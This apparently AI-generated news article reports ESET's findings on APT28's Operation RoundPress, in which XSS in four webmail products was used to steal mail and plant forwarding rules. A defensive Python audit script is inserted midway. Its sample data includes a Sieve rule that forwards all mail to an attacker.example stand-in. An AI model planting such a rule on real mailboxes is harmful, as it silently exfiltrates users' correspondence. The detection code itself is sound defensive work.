

Ethical Hacking News

Spies Hack High-Value Mail Servers Using Exploits from Yesteryear




Spies hack high-value mail servers using an exploit from yesteryear. ESET reported that Sednit, a Kremlin-backed hacking group, gained access to high-value email accounts by exploiting cross-site scripting (XSS) vulnerabilities in four different mail server packages. The attacks targeted government and defense contractors in several countries and highlight the ongoing threat posed by aging software bases.

  • Sednit, a Kremlin-backed hacking group, exploited XSS vulnerabilities in mail server software from four different makers.
  • The attacks targeted mail servers used by defense contractors and governmental organizations in Bulgaria, Romania, Africa, the European Union, and South America.
  • Sednit delivered XSS exploits through spearphishing emails, which were then executed when viewed from a vulnerable webmail instance.
  • The group exploited both a zero-day vulnerability (in MDaemon) and already-known but unpatched vulnerabilities, including in Horde.
  • The attacks highlighted the ongoing threat posed by aging software bases and the importance of regular security updates.



    In a concerning turn of events, security firm ESET has reported that Sednit, a Kremlin-backed hacking group also tracked as APT28, Fancy Bear, Forest Blizzard, and Sofacy, gained access to high-value email accounts by exploiting cross-site scripting (XSS) vulnerabilities in mail server software from four different makers. These packages include Roundcube, MDaemon, Horde, and Zimbra.

    The attacks, which have been dubbed Operation RoundPress, targeted mail servers used by defense contractors in Bulgaria and Romania, some of which are producing Soviet-era weapons for use in Ukraine as it fends off an invasion from Russia. Governmental organizations in those countries were also targeted. Other targets have included governments in Africa, the European Union, and South America.

    The Sednit group delivered XSS exploits through spearphishing emails. Hidden inside some of the HTML in the emails was an XSS exploit. In 2023, ESET observed Sednit exploiting CVE-2020-43770, a vulnerability that has since been patched in Roundcube. A year later, ESET watched Sednit exploit different XSS vulnerabilities in Horde, MDaemon, and Zimbra. One of the now-patched vulnerabilities, from MDaemon, was a zero-day at the time Sednit exploited it.

    The JavaScript included in the HTML portions of the emails exploited vulnerabilities present in the different mail servers. XSS exploits allow an attacker to control code that runs in a browser as it visits an affected site. The Sednit code caused mail clients to send contacts and previous emails to attacker-controlled servers. In some cases, it also created a Sieve rule that would forward all emails received in the future to a Sednit address.

    Like most XSS exploits, the Sednit JavaScript ran only when someone viewed the malicious email from a vulnerable webmail instance. In this respect, the infections had no persistence, although the JavaScript could run again and again as long as the email was reopened.
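The forwarding rule described above outlives the XSS session, so checking users' Sieve scripts for redirects to outside domains is the detection a defender would want. The following audit is an added example, not code from ESET or from the article; the Sieve scripts, the internal domain and the forwarding address are all constructed placeholders.

```python
import re

# Constructed sample Sieve scripts (hypothetical users); the redirect target is a
# placeholder, not an indicator from the report.
SAMPLE_SCRIPTS = {
    "alice": 'require ["fileinto"];\n'
             'if header :contains "subject" "invoice" { fileinto "Finance"; }\n',
    "bob":   'require ["copy"];\n'
             '# silently copies every message, conditional on nothing\n'
             'redirect :copy "collector@attacker.example";\n',
    "carol": 'if address :is "from" "boss@corp.example" '
             '{ redirect "carol@corp.example"; }\n',
}

# Domains that are legitimately allowed as forwarding targets (assumed).
INTERNAL_DOMAINS = {"corp.example"}

# Matches a redirect action, with or without the :copy tag, and captures the address.
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"', re.IGNORECASE)


def strip_comments(script):
    """Remove Sieve '#' line comments and '/* */' bracketed comments."""
    script = re.sub(r'/\*.*?\*/', '', script, flags=re.DOTALL)
    return re.sub(r'#[^\n]*', '', script)


def find_external_redirects(script, internal_domains):
    """Return (address, unconditional) for each redirect to a non-internal domain.

    A redirect is 'unconditional' when it sits outside every if-block, i.e. the
    braces opened before it have all been closed, so it applies to all mail."""
    cleaned = strip_comments(script)
    findings = []
    for m in REDIRECT_RE.finditer(cleaned):
        addr = m.group(1)
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain in internal_domains:
            continue
        prefix = cleaned[:m.start()]
        unconditional = prefix.count("{") == prefix.count("}")
        findings.append((addr, unconditional))
    return findings


def audit(scripts, internal_domains):
    """Map each user with a suspicious redirect to their findings."""
    return {u: h for u, s in scripts.items()
            if (h := find_external_redirects(s, internal_domains))}


if __name__ == "__main__":
    for user, hits in audit(SAMPLE_SCRIPTS, INTERNAL_DOMAINS).items():
        for addr, uncond in hits:
            scope = "ALL mail" if uncond else "matching mail"
            print(f"{user}: forwards {scope} to external address {addr}")
```

On a real deployment the scripts would be pulled from the server's Sieve storage (for example via ManageSieve) rather than from the embedded dict, and any hit should be cross-checked against the mailbox owner before the rule is removed.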

    The Operation RoundPress exploit chain is a concerning reminder that any software, however current, remains exposed if it is not patched promptly. The use of XSS exploits in these attacks highlights the ongoing threat posed by aging software bases and the importance of regular security updates.

    Sednit's reliance on XSS exploits to pilfer email secrets sounds more like something from a decade or two ago. These sorts of exploits in the wild aren't a regular occurrence in more recent years, although they live on, especially in aging software bases.





  • Published: Thu May 15 09:31:20 2025 by llama3.2 3B Q4_K_M
